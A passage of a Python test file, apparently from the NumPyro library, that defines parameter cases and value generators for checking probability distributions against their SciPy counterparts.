vmap_over.dispatch(dist.discrete.ZeroInflatedLogits)(\n self,\n base_dist=vmap_over(self.base_dist, rate=rate),\n gate_logits=gate_logits,\n gate=gate_logits,\n )\n dist_axes.rate = rate\n return dist_axes\n\n\nclass SparsePoisson(dist.Poisson):\n def __init__(self, rate, *, validate_args=None):\n super().__init__(rate, is_sparse=True, validate_args=validate_args)\n\n\nclass FoldedNormal(dist.FoldedDistribution):\n arg_constraints = {\"loc\": constraints.real, \"scale\": constraints.positive}\n\n def __init__(self, loc, scale, validate_args=None):\n self.loc = loc\n self.scale = scale\n super().__init__(dist.Normal(loc, scale), 
validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_folded_normal(self: \"FoldedNormal\", loc=None, scale=None):\n d = vmap_over.dispatch(dist.FoldedDistribution)(\n self, base_dist=vmap_over(self.base_dist, loc=loc, scale=scale)\n )\n d.loc = loc\n d.scale = scale\n return d\n\n\nclass _SparseCAR(dist.CAR):\n reparametrized_params = [\"loc\", \"correlation\", \"conditional_precision\"]\n\n def __init__(\n self,\n loc,\n correlation,\n conditional_precision,\n adj_matrix,\n *,\n is_sparse=True,\n validate_args=None,\n ):\n super().__init__(\n loc,\n correlation,\n conditional_precision,\n adj_matrix,\n is_sparse=True,\n validate_args=validate_args,\n )\n\n\n_DIST_MAP = {\n dist.AsymmetricLaplace: lambda loc, scale, asymmetry: osp.laplace_asymmetric(\n asymmetry, loc=loc, scale=scale\n ),\n dist.BernoulliProbs: lambda probs: osp.bernoulli(p=probs),\n dist.BernoulliLogits: lambda logits: osp.bernoulli(p=_to_probs_bernoulli(logits)),\n dist.Beta: lambda con1, con0: osp.beta(con1, con0),\n dist.BetaProportion: lambda mu, kappa: osp.beta(mu * kappa, (1 - mu) * kappa),\n dist.BinomialProbs: lambda probs, total_count: osp.binom(n=total_count, p=probs),\n dist.BinomialLogits: lambda logits, total_count: osp.binom(\n n=total_count, p=_to_probs_bernoulli(logits)\n ),\n dist.Cauchy: lambda loc, scale: osp.cauchy(loc=loc, scale=scale),\n dist.Chi2: lambda df: osp.chi2(df),\n dist.Dirichlet: lambda conc: osp.dirichlet(conc),\n dist.Exponential: lambda rate: osp.expon(scale=jnp.reciprocal(rate)),\n dist.Gamma: lambda conc, rate: osp.gamma(conc, scale=1.0 / rate),\n dist.GeometricProbs: lambda probs: osp.geom(p=probs, loc=-1),\n dist.GeometricLogits: lambda logits: osp.geom(\n p=_to_probs_bernoulli(logits), loc=-1\n ),\n dist.Gumbel: lambda loc, scale: osp.gumbel_r(loc=loc, scale=scale),\n dist.HalfCauchy: lambda scale: osp.halfcauchy(scale=scale),\n dist.HalfNormal: lambda scale: osp.halfnorm(scale=scale),\n dist.InverseGamma: lambda conc, rate: osp.invgamma(conc, scale=rate),\n dist.Laplace: lambda loc, scale: osp.laplace(loc=loc, scale=scale),\n dist.LogNormal: lambda loc, scale: osp.lognorm(s=scale, scale=jnp.exp(loc)),\n dist.LogUniform: lambda a, b: osp.loguniform(a, b),\n dist.MultinomialProbs: lambda probs, total_count: osp.multinomial(\n n=total_count, p=probs\n ),\n dist.MultinomialLogits: lambda logits, total_count: osp.multinomial(\n n=total_count, p=_to_probs_multinom(logits)\n ),\n dist.MultivariateNormal: _mvn_to_scipy,\n dist.MultivariateStudentT: _multivariate_t_to_scipy,\n dist.LowRankMultivariateNormal: _lowrank_mvn_to_scipy,\n dist.Normal: lambda loc, scale: osp.norm(loc=loc, scale=scale),\n dist.Pareto: lambda scale, alpha: osp.pareto(alpha, scale=scale),\n dist.Poisson: lambda rate: osp.poisson(rate),\n dist.StudentT: lambda df, loc, scale: osp.t(df=df, loc=loc, scale=scale),\n dist.Uniform: lambda a, b: osp.uniform(a, b - a),\n dist.Logistic: lambda loc, scale: osp.logistic(loc=loc, scale=scale),\n dist.VonMises: lambda loc, conc: osp.vonmises(\n loc=np.array(loc, dtype=np.float64), kappa=np.array(conc, dtype=np.float64)\n ),\n dist.Weibull: lambda scale, conc: osp.weibull_min(\n c=conc,\n scale=scale,\n ),\n _TruncatedNormal: _truncnorm_to_scipy,\n}\n\n\ndef get_sp_dist(jax_dist):\n classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]\n for cls in classes:\n if cls in _DIST_MAP:\n return _DIST_MAP[cls]\n\n\nCONTINUOUS = [\n T(dist.AsymmetricLaplace, 1.0, 0.5, 1.0),\n T(dist.AsymmetricLaplace, np.array([1.0, 2.0]), 2.0, 2.0),\n 
T(dist.AsymmetricLaplace, np.array([[1.0], [2.0]]), 2.0, np.array([3.0, 5.0])),\n T(dist.AsymmetricLaplaceQuantile, 0.0, 1.0, 0.5),\n T(dist.AsymmetricLaplaceQuantile, np.array([1.0, 2.0]), 2.0, 0.7),\n T(\n dist.AsymmetricLaplaceQuantile,\n np.array([[1.0], [2.0]]),\n 2.0,\n np.array([0.2, 0.8]),\n ),\n T(dist.Beta, 0.2, 1.1),\n T(dist.Beta, 1.0, np.array([2.0, 2.0])),\n T(dist.Beta, 1.0, np.array([[1.0, 1.0], [2.0, 2.0]])),\n T(dist.BetaProportion, 0.2, 10.0),\n T(dist.BetaProportion, 0.51, np.array([2.0, 1.0])),\n T(dist.BetaProportion, 0.5, np.array([[4.0, 4.0], [2.0, 2.0]])),\n T(dist.Chi2, 2.0),\n T(dist.Chi2, np.array([0.3, 1.3])),\n T(dist.Cauchy, 0.0, 1.0),\n T(dist.Cauchy, 0.0, np.array([1.0, 2.0])),\n T(dist.Cauchy, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),\n T(dist.Dirichlet, np.array([1.7])),\n T(dist.Dirichlet, np.array([0.2, 1.1])),\n T(dist.Dirichlet, np.array([[0.2, 1.1], [2.0, 2.0]])),\n T(\n dist.EulerMaruyama,\n np.array([0.0, 0.1, 0.2]),\n sde_fn1,\n dist.Normal(0.1, 1.0),\n ),\n T(\n dist.EulerMaruyama,\n np.array([0.0, 0.1, 0.2]),\n sde_fn2,\n dist.Normal(jnp.array([0.0, 1.0]), 1e-3).to_event(1),\n ),\n T(\n dist.EulerMaruyama,\n np.array([[0.0, 0.1, 0.2], [10.0, 10.1, 10.2]]),\n sde_fn2,\n dist.Normal(jnp.array([0.0, 1.0]), 1e-3).to_event(1),\n ),\n T(\n dist.EulerMaruyama,\n np.array([[0.0, 0.1, 0.2], [10.0, 10.1, 10.2]]),\n sde_fn2,\n dist.Normal(jnp.array([[0.0, 1.0], [2.0, 3.0]]), 1e-2).to_event(1),\n ),\n T(dist.Exponential, 2.0),\n T(dist.Exponential, np.array([4.0, 2.0])),\n T(dist.Gamma, np.array([1.7]), np.array([[2.0], [3.0]])),\n T(dist.Gamma, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),\n T(dist.GaussianRandomWalk, 0.1, 10),\n T(dist.GaussianRandomWalk, np.array([0.1, 0.3, 0.25]), 10),\n T(\n dist.GaussianCopulaBeta,\n np.array([7.0, 2.0]),\n np.array([4.0, 10.0]),\n np.array([[1.0, 0.75], [0.75, 1.0]]),\n ),\n T(dist.GaussianCopulaBeta, 2.0, 1.5, np.eye(3)),\n T(dist.GaussianCopulaBeta, 2.0, 1.5, np.full((5, 3, 3), np.eye(3))),\n T(dist.Gompertz, np.array([1.7]), np.array([[2.0], [3.0]])),\n T(dist.Gompertz, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),\n T(dist.Gumbel, 0.0, 1.0),\n T(dist.Gumbel, 0.5, 2.0),\n T(dist.Gumbel, np.array([0.0, 0.5]), np.array([1.0, 2.0])),\n T(FoldedNormal, 2.0, 4.0),\n T(FoldedNormal, np.array([2.0, 50.0]), np.array([4.0, 100.0])),\n T(dist.HalfCauchy, 1.0),\n T(dist.HalfCauchy, np.array([1.0, 2.0])),\n T(dist.HalfNormal, 1.0),\n T(dist.HalfNormal, np.array([1.0, 2.0])),\n T(_ImproperWrapper, constraints.positive, (), (3,)),\n T(dist.InverseGamma, np.array([1.7]), np.array([[2.0], [3.0]])),\n T(dist.InverseGamma, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),\n T(dist.Kumaraswamy, 10.0, np.array([2.0, 3.0])),\n T(dist.Kumaraswamy, np.array([1.7]), np.array([[2.0], [3.0]])),\n T(dist.Kumaraswamy, 0.6, 0.5),\n T(dist.Laplace, 0.0, 1.0),\n T(dist.Laplace, 0.5, np.array([1.0, 2.5])),\n T(dist.Laplace, np.array([1.0, -0.5]), np.array([2.3, 3.0])),\n T(dist.LKJ, 2, 0.5, \"onion\"),\n T(dist.LKJ, 5, np.array([0.5, 1.0, 2.0]), \"cvine\"),\n T(dist.LKJCholesky, 2, 0.5, \"onion\"),\n T(dist.LKJCholesky, 2, 0.5, \"cvine\"),\n T(dist.LKJCholesky, 5, np.array([0.5, 1.0, 2.0]), \"onion\"),\n pytest.param(\n *T(dist.LKJCholesky, 5, np.array([0.5, 1.0, 2.0]), \"cvine\"),\n marks=pytest.mark.skipif(\"CI\" in os.environ, reason=\"reduce time for CI\"),\n ),\n pytest.param(\n *T(dist.LKJCholesky, 3, np.array([[3.0, 0.6], [0.2, 5.0]]), \"onion\"),\n marks=pytest.mark.skipif(\"CI\" in os.environ, reason=\"reduce time for 
CI\"),\n ),\n T(dist.LKJCholesky, 3, np.array([[3.0, 0.6], [0.2, 5.0]]), \"cvine\"),\n T(dist.Logistic, 0.0, 1.0),\n T(dist.Logistic, 1.0, np.array([1.0, 2.0])),\n T(dist.Logistic, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),\n T(dist.LogNormal, 1.0, 0.2),\n T(dist.LogNormal, -1.0, np.array([0.5, 1.3])),\n T(dist.LogNormal, np.array([0.5, -0.7]), np.array([[0.1, 0.4], [0.5, 0.1]])),\n T(dist.LogUniform, 1.0, 2.0),\n T(dist.LogUniform, 1.0, np.array([2.0, 3.0])),\n T(dist.LogUniform, np.array([1.0, 2.0]), np.array([[3.0], [4.0]])),\n T(\n dist.MatrixNormal,\n 1.0 * np.arange(6).reshape(3, 2),\n np.array([[1.0, 0, 0], [0.3, 0.36, 0], [0.4, 0.49, 4]]),\n np.array([[1.0, 0], [0.4, 1]]),\n ),\n T(\n dist.MatrixNormal,\n 1.0 * np.arange(12).reshape((2, 3, 2)),\n np.array([[1.0, 0, 0], [0.3, 0.36, 0], [0.4, 0.49, 4]]) * np.ones((2, 3, 3)),\n np.array([[1.0, 0], [0.4, 0.5]]) * np.ones((2, 2, 2)),\n ),\n T(\n dist.MatrixNormal,\n 1.0 * np.arange(36).reshape((2, 3, 3, 2)),\n np.identity(3),\n np.identity(2),\n ),\n T(dist.MultivariateNormal, 0.0, np.array([[1.0, 0.5], [0.5, 1.0]]), None, None),\n T(\n dist.MultivariateNormal,\n np.array([1.0, 3.0]),\n None,\n np.array([[1.0, 0.5], [0.5, 1.0]]),\n None,\n ),\n T(\n dist.MultivariateNormal,\n np.array([1.0, 3.0]),\n None,\n np.array([[[1.0, 0.5], [0.5, 1.0]]]),\n None,\n ),\n T(\n dist.MultivariateNormal,\n np.array([2.0]),\n None,\n None,\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateNormal,\n np.arange(6, dtype=np.float32).reshape((3, 2)),\n None,\n None,\n np.array([[1.0, 0.0], [0.0, 1.0]]),\n ),\n T(\n dist.MultivariateNormal,\n 0.0,\n None,\n np.broadcast_to(np.identity(3), (2, 3, 3)),\n None,\n ),\n T(\n dist.CAR,\n 1.2,\n np.array([-0.2, 0.3]),\n 0.1,\n np.array(\n [\n [0.0, 1.0, 1.0, 0.0],\n [1.0, 0.0, 0.0, 1.0],\n [1.0, 0.0, 0.0, 1.0],\n [0.0, 1.0, 1.0, 0.0],\n ]\n ),\n ),\n T(\n dist.CAR,\n np.array([0.0, 1.0, 3.0, 4.0]),\n 0.1,\n np.array([0.3, 0.7]),\n np.array(\n [\n [0.0, 1.0, 1.0, 0.0],\n [1.0, 0.0, 0.0, 1.0],\n [1.0, 0.0, 0.0, 1.0],\n [0.0, 1.0, 1.0, 0.0],\n ]\n ),\n ),\n T(\n _SparseCAR,\n np.array([[0.0, 1.0, 3.0, 4.0], [2.0, -1.0, -3.0, 2.0]]),\n 0.0,\n 0.1,\n np.array(\n [\n [0.0, 1.0, 1.0, 0.0],\n [1.0, 0.0, 0.0, 1.0],\n [1.0, 0.0, 0.0, 1.0],\n [0.0, 1.0, 1.0, 0.0],\n ]\n ),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n 0.0,\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n np.array([1.0, 3.0]),\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n np.array([1.0, 3.0]),\n np.array([[[1.0, 0.0], [0.5, 1.0]]]),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n np.array([3.0]),\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n np.arange(6, dtype=np.float32).reshape((3, 2)),\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n np.ones(3),\n np.broadcast_to(np.identity(3), (2, 3, 3)),\n ),\n T(\n dist.MultivariateStudentT,\n np.array(7.0),\n np.array([1.0, 3.0]),\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateStudentT,\n np.arange(20, 22, dtype=jnp.float32),\n np.ones(3),\n np.broadcast_to(jnp.identity(3), (2, 3, 3)),\n ),\n T(\n dist.MultivariateStudentT,\n np.arange(20, 26, dtype=jnp.float32).reshape((3, 2)),\n np.ones(2),\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.LowRankMultivariateNormal,\n np.zeros(2),\n np.array([[1.0], [0.0]]),\n np.array([1.0, 1.0]),\n ),\n T(\n dist.LowRankMultivariateNormal,\n np.arange(6, 
dtype=jnp.float32).reshape((2, 3)),\n np.arange(6, dtype=jnp.float32).reshape((3, 2)),\n np.array([1.0, 2.0, 3.0]),\n ),\n T(dist.Normal, 0.0, 1.0),\n T(dist.Normal, 1.0, np.array([1.0, 2.0])),\n T(dist.Normal, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),\n T(dist.Pareto, 1.0, 2.0),\n T(dist.Pareto, np.array([1.0, 0.5]), np.array([0.3, 2.0])),\n T(dist.Pareto, np.array([[1.0], [3.0]]), np.array([1.0, 0.5])),\n T(dist.RelaxedBernoulliLogits, 2.0, -10.0),\n T(dist.RelaxedBernoulliLogits, np.array([1.0, 3.0]), np.array([3.0, 8.0])),\n T(dist.SoftLaplace, 1.0, 1.0),\n T(dist.SoftLaplace, np.array([-1.0, 50.0]), np.array([4.0, 100.0])),\n T(dist.StudentT, 1.0, 1.0, 0.5),\n T(dist.StudentT, 2.0, np.array([1.0, 2.0]), 2.0),\n T(dist.StudentT, np.array([3.0, 5.0]), np.array([[1.0], [2.0]]), 2.0),\n T(_TruncatedCauchy, 0.0, 1.0, -1.0, None),\n T(_TruncatedCauchy, 0.0, np.array([1.0, 2.0]), 1.0, None),\n T(\n _TruncatedCauchy,\n np.array([0.0, 1.0]),\n np.array([[1.0], [2.0]]),\n np.array([-2.0, 2.0]),\n None,\n ),\n T(_TruncatedCauchy, 0.0, 1.0, None, 1.0),\n T(_TruncatedCauchy, 0.0, 1.0, -1.0, 1.0),\n T(_TruncatedNormal, 0.0, 1.0, -1.0, None),\n T(_TruncatedNormal, -1.0, np.array([1.0, 2.0]), 1.0, None),\n T(\n _TruncatedNormal,\n np.array([0.0, 1.0]),\n np.array([[1.0], [2.0]]),\n np.array([-2.0, 2.0]),\n None,\n ),\n T(_TruncatedNormal, -1.0, 2.0, 1.0, 5.0),\n T(_TruncatedNormal, np.array([-1.0, 4.0]), 2.0, None, 5.0),\n T(_TruncatedNormal, -1.0, np.array([2.0, 3.0]), 1.0, None),\n T(_TruncatedNormal, -1.0, 2.0, np.array([-6.0, 4.0]), np.array([-4.0, 6.0])),\n T(\n _TruncatedNormal,\n np.array([0.0, 1.0]),\n np.array([[1.0], [2.0]]),\n None,\n np.array([-2.0, 2.0]),\n ),\n T(dist.TwoSidedTruncatedDistribution, dist.Laplace(0.0, 1.0), -2.0, 3.0),\n T(dist.Uniform, 0.0, 2.0),\n T(dist.Uniform, 1.0, np.array([2.0, 3.0])),\n T(dist.Uniform, np.array([0.0, 0.0]), np.array([[2.0], [3.0]])),\n T(dist.Weibull, 0.2, 1.1),\n T(dist.Weibull, 2.8, np.array([2.0, 2.0])),\n T(dist.Weibull, 1.8, np.array([[1.0, 1.0], [2.0, 2.0]])),\n T(\n _GaussianMixture,\n np.ones(3) / 3.0,\n np.array([0.0, 7.7, 2.1]),\n np.array([4.2, 7.7, 2.1]),\n ),\n T(\n _Gaussian2DMixture,\n np.array([0.2, 0.5, 0.3]),\n np.array([[-1.2, 1.5], [2.0, 2.0], [-1, 4.0]]), # Mean\n np.array(\n [\n [\n [0.1, -0.2],\n [-0.2, 1.0],\n ],\n [\n [0.75, 0.0],\n [0.0, 0.75],\n ],\n [\n [1.0, 0.5],\n [0.5, 0.27],\n ],\n ]\n ), # Covariance\n ),\n T(\n _GeneralMixture,\n np.array([0.2, 0.3, 0.5]),\n np.array([0.0, 7.7, 2.1]),\n np.array([4.2, 1.7, 2.1]),\n ),\n T(\n _General2DMixture,\n np.array([0.2, 0.5, 0.3]),\n np.array([[-1.2, 1.5], [2.0, 2.0], [-1, 4.0]]), # Mean\n np.array(\n [\n [\n [0.1, -0.2],\n [-0.2, 1.0],\n ],\n [\n [0.75, 0.0],\n [0.0, 0.75],\n ],\n [\n [1.0, 0.5],\n [0.5, 0.27],\n ],\n ]\n ), # Covariance\n ),\n]\n\nDIRECTIONAL = [\n T(dist.VonMises, 2.0, 10.0),\n T(dist.VonMises, 2.0, np.array([150.0, 10.0])),\n T(dist.VonMises, np.array([1 / 3 * np.pi, -1.0]), np.array([20.0, 30.0])),\n pytest.param(\n *T(\n dist.SineBivariateVonMises,\n 0.0,\n 0.0,\n 5.0,\n 6.0,\n 2.0,\n ),\n marks=pytest.mark.skipif(\"CI\" in os.environ, reason=\"reduce time for CI\"),\n ),\n T(\n dist.SineBivariateVonMises,\n 3.003,\n -1.343,\n 5.0,\n 6.0,\n 2.0,\n ),\n pytest.param(\n *T(\n dist.SineBivariateVonMises,\n -1.232,\n -1.3430,\n 3.4,\n 2.0,\n 1.0,\n ),\n marks=pytest.mark.skipif(\"CI\" in os.environ, reason=\"reduce time for CI\"),\n ),\n pytest.param(\n *T(\n dist.SineBivariateVonMises,\n np.array([math.pi - 0.2, 1.0]),\n np.array([0.0, 1.0]),\n 
np.array([5.0, 5.0]),\n np.array([7.0, 0.5]),\n None,\n np.array([0.5, 0.1]),\n ),\n marks=pytest.mark.skipif(\"CI\" in os.environ, reason=\"reduce time for CI\"),\n ),\n T(dist.ProjectedNormal, np.array([0.0, 0.0])),\n T(dist.ProjectedNormal, np.array([[2.0, 3.0]])),\n T(dist.ProjectedNormal, np.array([0.0, 0.0, 0.0])),\n T(dist.ProjectedNormal, np.array([[-1.0, 2.0, 3.0]])),\n T(SineSkewedUniform, np.array([-math.pi / 4, 0.1])),\n T(SineSkewedVonMises, np.array([0.342355])),\n T(SineSkewedVonMisesBatched, np.array([[0.342355, -0.0001], [0.91, 0.09]])),\n]\n\nDISCRETE = [\n T(dist.BetaBinomial, 2.0, 5.0, 10),\n T(\n dist.BetaBinomial,\n np.array([2.0, 4.0]),\n np.array([5.0, 3.0]),\n np.array([10, 12]),\n ),\n T(dist.BernoulliProbs, 0.2),\n T(dist.BernoulliProbs, np.array([0.2, 0.7])),\n T(dist.BernoulliLogits, np.array([-1.0, 3.0])),\n T(dist.BinomialProbs, np.array([0.2, 0.7]), np.array([10, 2])),\n T(dist.BinomialProbs, np.array([0.2, 0.7]), np.array([5, 8])),\n T(dist.BinomialLogits, np.array([-1.0, 3.0]), np.array([5, 8])),\n T(dist.CategoricalProbs, np.array([1.0])),\n T(dist.CategoricalProbs, np.array([0.1, 0.5, 0.4])),\n T(dist.CategoricalProbs, np.array([[0.1, 0.5, 0.4], [0.4, 0.4, 0.2]])),\n T(dist.CategoricalLogits, np.array([-5.0])),\n T(dist.CategoricalLogits, np.array([1.0, 2.0, -2.0])),\n T(dist.CategoricalLogits, np.array([[-1, 2.0, 3.0], [3.0, -4.0, -2.0]])),\n T(dist.Delta, 1),\n T(dist.Delta, np.array([0.0, 2.0])),\n T(dist.Delta, np.array([0.0, 2.0]), np.array([-2.0, -4.0])),\n T(dist.DirichletMultinomial, np.array([1.0, 2.0, 3.9]), 10),\n T(dist.DirichletMultinomial, np.array([0.2, 0.7, 1.1]), np.array([5, 5])),\n T(dist.GammaPoisson, 2.0, 2.0),\n T(dist.GammaPoisson, np.array([6.0, 2]), np.array([2.0, 8.0])),\n T(dist.GeometricProbs, 0.2),\n T(dist.GeometricProbs, np.array([0.2, 0.7])),\n T(dist.GeometricLogits, np.array([-1.0, 3.0])),\n T(dist.MultinomialProbs, np.array([0.2, 0.7, 0.1]), 10),\n T(dist.MultinomialProbs, np.array([0.2, 0.7, 0.1]), np.array([5, 8])),\n T(dist.MultinomialLogits, np.array([-1.0, 3.0]), np.array([[5], [8]])),\n T(dist.NegativeBinomialProbs, 10, 0.2),\n T(dist.NegativeBinomialProbs, 10, np.array([0.2, 0.6])),\n T(dist.NegativeBinomialProbs, np.array([4.2, 10.7, 2.1]), 0.2),\n T(\n dist.NegativeBinomialProbs,\n np.array([4.2, 10.7, 2.1]),\n np.array([0.2, 0.6, 0.5]),\n ),\n T(dist.NegativeBinomialLogits, 10, -2.1),\n T(dist.NegativeBinomialLogits, 10, np.array([-5.2, 2.1])),\n T(dist.NegativeBinomialLogits, np.array([4.2, 10.7, 2.1]), -5.2),\n T(\n dist.NegativeBinomialLogits,\n np.array([4.2, 7.7, 2.1]),\n np.array([4.2, 0.7, 2.1]),\n ),\n T(dist.NegativeBinomial2, 0.3, 10),\n T(dist.NegativeBinomial2, np.array([10.2, 7, 31]), 10),\n T(dist.NegativeBinomial2, np.array([10.2, 7, 31]), np.array([10.2, 20.7, 2.1])),\n T(dist.OrderedLogistic, -2, np.array([-10.0, 4.0, 9.0])),\n T(dist.OrderedLogistic, np.array([-4, 3, 4, 5]), np.array([-1.5])),\n T(dist.DiscreteUniform, -2, np.array([-1.0, 4.0, 9.0])),\n T(dist.DiscreteUniform, np.array([-4, 3, 4, 5]), np.array([6])),\n T(dist.Poisson, 2.0),\n T(dist.Poisson, np.array([2.0, 3.0, 5.0])),\n T(SparsePoisson, 2.0),\n T(SparsePoisson, np.array([2.0, 3.0, 5.0])),\n T(SparsePoisson, 2),\n T(dist.ZeroInflatedPoisson, 0.6, 2.0),\n T(dist.ZeroInflatedPoisson, np.array([0.2, 0.7, 0.3]), np.array([2.0, 3.0, 5.0])),\n T(ZeroInflatedPoissonLogits, 2.0, 3.0),\n T(\n ZeroInflatedPoissonLogits,\n np.array([0.2, 4.0, 0.3]),\n np.array([2.0, -3.0, 5.0]),\n ),\n]\n\n\ndef _is_batched_multivariate(jax_dist):\n 
return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0\n\n\ndef gen_values_within_bounds(constraint, size, key=random.PRNGKey(11)):\n eps = 1e-6\n\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size)\n elif isinstance(constraint, constraints.greater_than):\n return jnp.exp(random.normal(key, size)) + constraint.lower_bound + eps\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.randint(key, size, lower_bound, upper_bound + 1)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound + random.poisson(key, np.array(5), shape=size)\n elif isinstance(constraint, constraints.interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=lower_bound, maxval=upper_bound)\n elif constraint in (constraints.real, constraints.real_vector):\n return random.normal(key, size)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1])\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return multinomial(\n key, p=jnp.ones((n,)) / n, n=constraint.upper_bound, shape=size[:-1]\n )\n elif constraint is constraints.corr_cholesky:\n return signed_stick_breaking_tril(\n random.uniform(\n key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1\n )\n )\n elif constraint is constraints.corr_matrix:\n cholesky = signed_stick_breaking_tril(\n random.uniform(\n key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1\n )\n )\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return jnp.tril(random.uniform(key, size))\n elif constraint is constraints.positive_definite:\n x = random.normal(key, size)\n return jnp.matmul(x, jnp.swapaxes(x, -2, -1))\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x - random.normal(key, size[:-1] + (1,))\n elif isinstance(constraint, constraints.independent):\n return gen_values_within_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n return x / jnp.linalg.norm(x, axis=-1)\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [0, (-1) ** sign * 0.5]\n return random.uniform(key, size, float, *sorted(bounds))\n\n else:\n raise NotImplementedError(\"{} not implemented.\".format(constraint))\n\n\ndef gen_values_outside_bounds(constraint, size, key=random.PRNGKey(11)):\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size) - 2\n elif isinstance(constraint, constraints.greater_than):\n return constraint.lower_bound - jnp.exp(random.normal(key, size))\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n return random.randint(key, size, lower_bound - 1, lower_bound)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound - random.poisson(key, np.array(5), shape=size)\n elif isinstance(constraint, constraints.interval):\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=upper_bound, 
maxval=upper_bound + 1.0)\n elif constraint in [constraints.real, constraints.real_vector]:\n return lax.full(size, np.nan)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1]) + 1e-2\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return (\n multinomial(\n key, p=jnp.ones((n,)) / n, n=constraint.upper_bound, shape=size[:-1]\n )\n + 1\n )\n elif constraint is constraints.corr_cholesky:\n return (\n signed_stick_breaking_tril(\n random.uniform(\n key,\n size[:-2] + (size[-1] * (size[-1] - 1) // 2,),\n minval=-1,\n maxval=1,\n )\n )\n + 1e-2\n )\n elif constraint is constraints.corr_matrix:\n cholesky = 1e-2 + signed_stick_breaking_tril(\n random.uniform(\n key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1\n )\n )\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return random.uniform(key, size)\n elif constraint is constraints.positive_definite:\n return random.normal(key, size)\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x[..., ::-1]\n elif isinstance(constraint, constraints.independent):\n return gen_values_outside_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n x = x / jnp.linalg.norm(x, axis=-1, keepdims=True)\n return 2 * x\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [(-1) ** sign * 1.1, (-1) ** sign * 2]\n return random.uniform(key, size, float, *sorted(bounds))\n else:\n raise NotImplementedError(\"{} not implemented.\".format(constraint))\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\[email protected](\"prepend_shape\", [(), (2,), (2, 3)])\ndef test_dist_shape(jax_dist, sp_dist, params, prepend_shape):\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n expected_shape = prepend_shape + jax_dist.batch_shape + jax_dist.event_shape\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert isinstance(samples, jnp.ndarray)\n assert jnp.shape(samples) == expected_shape\n if (\n sp_dist\n and not _is_batched_multivariate(jax_dist)\n and not isinstance(jax_dist, dist.MultivariateStudentT)\n ):\n sp_dist = sp_dist(*params)\n sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)\n assert jnp.shape(sp_samples) == expected_shape\n elif (\n sp_dist\n and not _is_batched_multivariate(jax_dist)\n and isinstance(jax_dist, dist.MultivariateStudentT)\n ):\n sp_dist = sp_dist(*params)\n size_ = prepend_shape + jax_dist.batch_shape\n size = (1) if size_ == () else size_\n try:\n sp_samples = sp_dist.rvs(size=size)\n except ValueError:\n pytest.skip(\"scipy multivariate t doesn't support size with > 1 element\")\n assert jnp.shape(sp_samples) == expected_shape\n if isinstance(jax_dist, (dist.MultivariateNormal, dist.MultivariateStudentT)):\n assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2\n assert_allclose(\n jax_dist.precision_matrix,\n jnp.linalg.inv(jax_dist.covariance_matrix),\n rtol=1e-6,\n )\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + 